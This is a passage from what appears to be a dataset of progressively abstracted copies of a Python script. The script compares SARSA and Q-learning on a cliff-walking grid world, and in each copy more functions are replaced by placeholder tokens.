plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))\n\n\ndef plot_best_q_values_states(states, method, epsilon, PLOTS, fig, ax):\n final_grid = np.array([[max(states[i][j].q_values) for j in range(\n N_COLUMNS)] for i in range(N_ROWS)])\n if PLOTS > 2:\n ax = ax[PLOTS % 3, 1]\n else:\n ax = ax[PLOTS, 0]\n ax.imshow(final_grid, aspect='auto', cmap='coolwarm')\n ax.set_xticks(np.arange(N_COLUMNS))\n ax.set_yticks(np.arange(N_ROWS))\n ax.set_xticklabels([i for i in range(N_COLUMNS)])\n ax.set_yticklabels([i for i in range(N_ROWS)])\n plt.setp(ax.get_xticklabels(), rotation=45, ha='right', rotation_mode=\n 'anchor')\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n text = ax.text(j, i, '{:.2f}'.format(max(states[i][j].q_values)\n ), ha='center', va='center', color='w')\n fig.tight_layout()\n ax.set_title('{}; $\\\\epsilon={}$'.format(method, epsilon))\n for i in range(N_ROWS):\n str_ = ''\n for j in range(N_COLUMNS):\n str_ += str(int(final_grid[i][j])) + ', '\n PLOTS += 1\n\n\ndef display_optimal_policy(states, method, epsilon):\n print('{}; ε = {}'.format(method, epsilon))\n print('-' * 60)\n for i in range(len(states)):\n line_str = ''\n for j in range(len(states[0])):\n if j == 0:\n print('|', end='')\n if states[i][j].is_goal:\n print(Back.GREEN + ' ', end='')\n 
print(Style.RESET_ALL + ' | ', end='')\n elif states[i][j].is_cliff:\n print(Back.RED + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n else:\n print(' {} | '.format(q_to_arrow(states[i][j].\n get_max_q_index())), end='')\n print(line_str)\n print('-' * 60)\n\n\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\n<function token>\n\n\ndef reward(s_1, s_2):\n if s_1.is_goal or s_1.is_cliff:\n return 0\n elif s_2.is_goal:\n return 10\n elif s_2.is_cliff:\n return -100\n else:\n return -1\n\n\n<docstring token>\n\n\ndef transition(stsp, s, di, dj):\n if s.is_cliff or s.is_goal:\n return s\n elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):\n return s\n else:\n return stsp[s.i + di][s.j + dj]\n\n\n<assignment token>\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\ndef sarsa(state, next_state, action, next_state_action):\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma * next_state\n .q_values[next_state_action] - state.q_values[action])\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\n<assignment token>\n\n\ndef run_code(use_q_learning=False, _epsilon=0.01):\n states = initialize_states()\n decay = 1\n min_epsilon = 1e-05\n epsilon = _epsilon\n episode_rewards = []\n mistakes_array = []\n for i in range(N_STEPS):\n current_state = states[N_ROWS - 1][0]\n epsilon = max(min_epsilon, epsilon * decay)\n episode_reward = 0\n while not current_state.is_terminal():\n if random() < epsilon:\n next_action = randint(0, 3)\n else:\n next_action = current_state.get_max_q_index()\n di, dj = action_to_diff_vector(next_action)\n next_state = transition(states, current_state, di, dj)\n if random() < epsilon:\n next_state_action = randint(0, 3)\n else:\n next_state_action = next_state.get_max_q_index()\n if use_q_learning:\n reward, current_state.q_values[next_action] = q_learning(\n current_state, next_state, next_action, next_state_action)\n else:\n reward, current_state.q_values[next_action] = sarsa(\n current_state, next_state, next_action, next_state_action)\n episode_reward += reward\n current_state = next_state\n if len(episode_rewards):\n episode_rewards.append(episode_rewards[-1] + episode_reward)\n else:\n episode_rewards.append(episode_reward)\n \"\"\"\n if (i % 100 == 0):\n 
print(i)\n \"\"\"\n mistakes_array.append(check_accuracy(states))\n return np.array(mistakes_array), states, episode_rewards\n\n\ndef check_accuracy(states):\n correct_result = np.array([[-3, -2, -1, 0, 1, 2, 3, 4, 5, 6], [-2, -1, \n 0, 1, 2, 3, 4, 5, 6, 7], [-1, 0, 1, 2, 3, 4, 5, 6, 7, 8], [0, 1, 2,\n 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], [0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0]])\n mistakes_delta = 0\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n mistakes_delta += abs(correct_result[i][j] - max(states[i][j].\n q_values))\n return mistakes_delta\n\n\ndef plot_errors(mistakes_sarsa, mistakes_q_learning):\n plt.gca().invert_yaxis()\n legend = []\n for mistake_sarsa in mistakes_sarsa:\n plt.plot(mistake_sarsa[1])\n legend.append('SARSA $\\\\epsilon={}$'.format(mistake_sarsa[0]))\n for mistake_q_learning in mistakes_q_learning:\n plt.plot(mistake_q_learning[1])\n legend.append('Q-learning $\\\\epsilon={}$'.format(mistake_q_learning[0])\n )\n plt.grid(which='y')\n plt.legend(legend)\n plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))\n\n\ndef plot_best_q_values_states(states, method, epsilon, PLOTS, fig, ax):\n final_grid = np.array([[max(states[i][j].q_values) for j in range(\n N_COLUMNS)] for i in range(N_ROWS)])\n if PLOTS > 2:\n ax = ax[PLOTS % 3, 1]\n else:\n ax = ax[PLOTS, 0]\n ax.imshow(final_grid, aspect='auto', cmap='coolwarm')\n ax.set_xticks(np.arange(N_COLUMNS))\n ax.set_yticks(np.arange(N_ROWS))\n ax.set_xticklabels([i for i in range(N_COLUMNS)])\n ax.set_yticklabels([i for i in range(N_ROWS)])\n plt.setp(ax.get_xticklabels(), rotation=45, ha='right', rotation_mode=\n 'anchor')\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n text = ax.text(j, i, '{:.2f}'.format(max(states[i][j].q_values)\n ), ha='center', va='center', color='w')\n fig.tight_layout()\n ax.set_title('{}; $\\\\epsilon={}$'.format(method, epsilon))\n for i in range(N_ROWS):\n str_ = ''\n for j in range(N_COLUMNS):\n str_ += str(int(final_grid[i][j])) + ', '\n PLOTS += 1\n\n\ndef display_optimal_policy(states, method, epsilon):\n print('{}; ε = {}'.format(method, epsilon))\n print('-' * 60)\n for i in range(len(states)):\n line_str = ''\n for j in range(len(states[0])):\n if j == 0:\n print('|', end='')\n if states[i][j].is_goal:\n print(Back.GREEN + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n elif states[i][j].is_cliff:\n print(Back.RED + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n else:\n print(' {} | '.format(q_to_arrow(states[i][j].\n get_max_q_index())), end='')\n print(line_str)\n print('-' * 60)\n\n\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\n<function token>\n\n\ndef reward(s_1, s_2):\n if s_1.is_goal or s_1.is_cliff:\n return 0\n elif s_2.is_goal:\n return 10\n elif s_2.is_cliff:\n return -100\n else:\n return -1\n\n\n<docstring token>\n\n\ndef 
transition(stsp, s, di, dj):\n if s.is_cliff or s.is_goal:\n return s\n elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):\n return s\n else:\n return stsp[s.i + di][s.j + dj]\n\n\n<assignment token>\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\ndef sarsa(state, next_state, action, next_state_action):\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma * next_state\n .q_values[next_state_action] - state.q_values[action])\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\n<assignment token>\n\n\ndef run_code(use_q_learning=False, _epsilon=0.01):\n states = initialize_states()\n decay = 1\n min_epsilon = 1e-05\n epsilon = _epsilon\n episode_rewards = []\n mistakes_array = []\n for i in range(N_STEPS):\n current_state = states[N_ROWS - 1][0]\n epsilon = max(min_epsilon, epsilon * decay)\n episode_reward = 0\n while not current_state.is_terminal():\n if random() < epsilon:\n next_action = randint(0, 3)\n else:\n next_action = current_state.get_max_q_index()\n di, dj = action_to_diff_vector(next_action)\n next_state = transition(states, current_state, di, dj)\n if random() < epsilon:\n next_state_action = randint(0, 3)\n else:\n next_state_action = next_state.get_max_q_index()\n if use_q_learning:\n reward, current_state.q_values[next_action] = q_learning(\n current_state, next_state, next_action, next_state_action)\n else:\n reward, current_state.q_values[next_action] = sarsa(\n current_state, next_state, next_action, next_state_action)\n episode_reward += reward\n current_state = next_state\n if len(episode_rewards):\n episode_rewards.append(episode_rewards[-1] + episode_reward)\n else:\n episode_rewards.append(episode_reward)\n \"\"\"\n if (i % 100 == 0):\n print(i)\n \"\"\"\n mistakes_array.append(check_accuracy(states))\n return np.array(mistakes_array), states, episode_rewards\n\n\ndef check_accuracy(states):\n correct_result = np.array([[-3, -2, -1, 0, 1, 2, 3, 4, 5, 6], [-2, -1, \n 0, 1, 2, 3, 4, 5, 6, 7], [-1, 0, 1, 2, 3, 4, 5, 6, 7, 8], [0, 1, 2,\n 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], [0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0]])\n mistakes_delta = 0\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n mistakes_delta += abs(correct_result[i][j] - max(states[i][j].\n q_values))\n return mistakes_delta\n\n\ndef plot_errors(mistakes_sarsa, mistakes_q_learning):\n plt.gca().invert_yaxis()\n legend = []\n for mistake_sarsa in mistakes_sarsa:\n plt.plot(mistake_sarsa[1])\n legend.append('SARSA $\\\\epsilon={}$'.format(mistake_sarsa[0]))\n for mistake_q_learning in mistakes_q_learning:\n plt.plot(mistake_q_learning[1])\n legend.append('Q-learning $\\\\epsilon={}$'.format(mistake_q_learning[0])\n )\n plt.grid(which='y')\n plt.legend(legend)\n plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))\n\n\n<function token>\n\n\ndef display_optimal_policy(states, method, epsilon):\n print('{}; ε = {}'.format(method, epsilon))\n print('-' * 60)\n for i in 
range(len(states)):\n line_str = ''\n for j in range(len(states[0])):\n if j == 0:\n print('|', end='')\n if states[i][j].is_goal:\n print(Back.GREEN + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n elif states[i][j].is_cliff:\n print(Back.RED + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n else:\n print(' {} | '.format(q_to_arrow(states[i][j].\n get_max_q_index())), end='')\n print(line_str)\n print('-' * 60)\n\n\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\n<function token>\n\n\ndef reward(s_1, s_2):\n if s_1.is_goal or s_1.is_cliff:\n return 0\n elif s_2.is_goal:\n return 10\n elif s_2.is_cliff:\n return -100\n else:\n return -1\n\n\n<docstring token>\n\n\ndef transition(stsp, s, di, dj):\n if s.is_cliff or s.is_goal:\n return s\n elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):\n return s\n else:\n return stsp[s.i + di][s.j + dj]\n\n\n<assignment token>\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\ndef sarsa(state, next_state, action, next_state_action):\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma * next_state\n .q_values[next_state_action] - state.q_values[action])\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\n<assignment token>\n\n\ndef run_code(use_q_learning=False, _epsilon=0.01):\n states = initialize_states()\n decay = 1\n min_epsilon = 1e-05\n epsilon = _epsilon\n episode_rewards = []\n mistakes_array = []\n for i in range(N_STEPS):\n current_state = states[N_ROWS - 1][0]\n epsilon = max(min_epsilon, epsilon * decay)\n episode_reward = 0\n while not current_state.is_terminal():\n if random() < epsilon:\n next_action = randint(0, 3)\n else:\n next_action = current_state.get_max_q_index()\n di, dj = action_to_diff_vector(next_action)\n next_state = transition(states, current_state, di, dj)\n if random() < epsilon:\n next_state_action = randint(0, 3)\n else:\n next_state_action = next_state.get_max_q_index()\n if use_q_learning:\n reward, current_state.q_values[next_action] = q_learning(\n current_state, next_state, next_action, next_state_action)\n else:\n reward, current_state.q_values[next_action] = sarsa(\n current_state, next_state, next_action, next_state_action)\n episode_reward += reward\n current_state = next_state\n if 
len(episode_rewards):\n episode_rewards.append(episode_rewards[-1] + episode_reward)\n else:\n episode_rewards.append(episode_reward)\n \"\"\"\n if (i % 100 == 0):\n print(i)\n \"\"\"\n mistakes_array.append(check_accuracy(states))\n return np.array(mistakes_array), states, episode_rewards\n\n\ndef check_accuracy(states):\n correct_result = np.array([[-3, -2, -1, 0, 1, 2, 3, 4, 5, 6], [-2, -1, \n 0, 1, 2, 3, 4, 5, 6, 7], [-1, 0, 1, 2, 3, 4, 5, 6, 7, 8], [0, 1, 2,\n 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], [0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0]])\n mistakes_delta = 0\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n mistakes_delta += abs(correct_result[i][j] - max(states[i][j].\n q_values))\n return mistakes_delta\n\n\n<function token>\n<function token>\n\n\ndef display_optimal_policy(states, method, epsilon):\n print('{}; ε = {}'.format(method, epsilon))\n print('-' * 60)\n for i in range(len(states)):\n line_str = ''\n for j in range(len(states[0])):\n if j == 0:\n print('|', end='')\n if states[i][j].is_goal:\n print(Back.GREEN + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n elif states[i][j].is_cliff:\n print(Back.RED + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n else:\n print(' {} | '.format(q_to_arrow(states[i][j].\n get_max_q_index())), end='')\n print(line_str)\n print('-' * 60)\n\n\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\n<function token>\n\n\ndef reward(s_1, s_2):\n if s_1.is_goal or s_1.is_cliff:\n return 0\n elif s_2.is_goal:\n return 10\n elif s_2.is_cliff:\n return -100\n else:\n return -1\n\n\n<docstring token>\n\n\ndef transition(stsp, s, di, dj):\n if s.is_cliff or s.is_goal:\n return s\n elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):\n return s\n else:\n return stsp[s.i + di][s.j + dj]\n\n\n<assignment token>\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\ndef sarsa(state, next_state, action, next_state_action):\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma * next_state\n .q_values[next_state_action] - state.q_values[action])\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\n<assignment token>\n\n\ndef run_code(use_q_learning=False, _epsilon=0.01):\n states = initialize_states()\n decay = 1\n min_epsilon = 
1e-05\n epsilon = _epsilon\n episode_rewards = []\n mistakes_array = []\n for i in range(N_STEPS):\n current_state = states[N_ROWS - 1][0]\n epsilon = max(min_epsilon, epsilon * decay)\n episode_reward = 0\n while not current_state.is_terminal():\n if random() < epsilon:\n next_action = randint(0, 3)\n else:\n next_action = current_state.get_max_q_index()\n di, dj = action_to_diff_vector(next_action)\n next_state = transition(states, current_state, di, dj)\n if random() < epsilon:\n next_state_action = randint(0, 3)\n else:\n next_state_action = next_state.get_max_q_index()\n if use_q_learning:\n reward, current_state.q_values[next_action] = q_learning(\n current_state, next_state, next_action, next_state_action)\n else:\n reward, current_state.q_values[next_action] = sarsa(\n current_state, next_state, next_action, next_state_action)\n episode_reward += reward\n current_state = next_state\n if len(episode_rewards):\n episode_rewards.append(episode_rewards[-1] + episode_reward)\n else:\n episode_rewards.append(episode_reward)\n \"\"\"\n if (i % 100 == 0):\n print(i)\n \"\"\"\n mistakes_array.append(check_accuracy(states))\n return np.array(mistakes_array), states, episode_rewards\n\n\ndef check_accuracy(states):\n correct_result = np.array([[-3, -2, -1, 0, 1, 2, 3, 4, 5, 6], [-2, -1, \n 0, 1, 2, 3, 4, 5, 6, 7], [-1, 0, 1, 2, 3, 4, 5, 6, 7, 8], [0, 1, 2,\n 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], [0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0]])\n mistakes_delta = 0\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n mistakes_delta += abs(correct_result[i][j] - max(states[i][j].\n q_values))\n return mistakes_delta\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\n<function token>\n\n\ndef reward(s_1, s_2):\n if s_1.is_goal or s_1.is_cliff:\n return 0\n elif s_2.is_goal:\n return 10\n elif s_2.is_cliff:\n return -100\n else:\n return -1\n\n\n<docstring token>\n\n\ndef transition(stsp, s, di, dj):\n if s.is_cliff or s.is_goal:\n return s\n elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):\n return s\n else:\n return stsp[s.i + di][s.j + dj]\n\n\n<assignment token>\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\ndef sarsa(state, next_state, action, next_state_action):\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma * next_state\n .q_values[next_state_action] - state.q_values[action])\n\n\ndef q_learning(state, next_state, action, 
next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\n<assignment token>\n\n\ndef run_code(use_q_learning=False, _epsilon=0.01):\n states = initialize_states()\n decay = 1\n min_epsilon = 1e-05\n epsilon = _epsilon\n episode_rewards = []\n mistakes_array = []\n for i in range(N_STEPS):\n current_state = states[N_ROWS - 1][0]\n epsilon = max(min_epsilon, epsilon * decay)\n episode_reward = 0\n while not current_state.is_terminal():\n if random() < epsilon:\n next_action = randint(0, 3)\n else:\n next_action = current_state.get_max_q_index()\n di, dj = action_to_diff_vector(next_action)\n next_state = transition(states, current_state, di, dj)\n if random() < epsilon:\n next_state_action = randint(0, 3)\n else:\n next_state_action = next_state.get_max_q_index()\n if use_q_learning:\n reward, current_state.q_values[next_action] = q_learning(\n current_state, next_state, next_action, next_state_action)\n else:\n reward, current_state.q_values[next_action] = sarsa(\n current_state, next_state, next_action, next_state_action)\n episode_reward += reward\n current_state = next_state\n if len(episode_rewards):\n episode_rewards.append(episode_rewards[-1] + episode_reward)\n else:\n episode_rewards.append(episode_reward)\n \"\"\"\n if (i % 100 == 0):\n print(i)\n \"\"\"\n mistakes_array.append(check_accuracy(states))\n return np.array(mistakes_array), states, episode_rewards\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\n<function token>\n\n\ndef reward(s_1, s_2):\n if s_1.is_goal or s_1.is_cliff:\n return 0\n elif s_2.is_goal:\n return 10\n elif s_2.is_cliff:\n return -100\n else:\n return -1\n\n\n<docstring token>\n\n\ndef transition(stsp, s, di, dj):\n if s.is_cliff or s.is_goal:\n return s\n elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):\n return s\n else:\n return stsp[s.i + di][s.j + dj]\n\n\n<assignment token>\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\ndef sarsa(state, next_state, action, next_state_action):\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma * next_state\n .q_values[next_state_action] - state.q_values[action])\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = 
next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\n<function token>\n\n\ndef reward(s_1, s_2):\n if s_1.is_goal or s_1.is_cliff:\n return 0\n elif s_2.is_goal:\n return 10\n elif s_2.is_cliff:\n return -100\n else:\n return -1\n\n\n<docstring token>\n\n\ndef transition(stsp, s, di, dj):\n if s.is_cliff or s.is_goal:\n return s\n elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):\n return s\n else:\n return stsp[s.i + di][s.j + dj]\n\n\n<assignment token>\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\n<function token>\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\n<function token>\n<function token>\n<docstring token>\n\n\ndef transition(stsp, s, di, dj):\n if s.is_cliff or s.is_goal:\n return s\n elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):\n return s\n else:\n return stsp[s.i + di][s.j + dj]\n\n\n<assignment token>\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif 
